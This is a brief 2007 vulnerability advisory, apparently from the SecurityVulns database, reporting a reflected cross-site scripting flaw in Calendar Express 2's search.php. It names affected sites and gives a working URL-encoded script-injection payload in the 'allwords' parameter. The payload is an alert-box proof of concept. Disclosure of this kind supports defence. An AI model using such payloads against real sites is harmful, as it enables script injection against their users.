XSS in [Calendar Express 2 ]

2007-02-15T00:00:00
ID SECURITYVULNS:DOC:16087
Type securityvulns
Reporter Securityvulns
Modified 2007-02-15T00:00:00

Description

hey guys .. check out this new xss i just found ;P

Vulnerable : Calendar Express 2 web : http://www.ci.emeryville.ca.us/calendar, http://www.phplite.com/products/calendarexpress/

XSS :

http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1

Discovered By BLacK ZeRo K.S.A bL4ck@bsdmail.org

Best regards ,,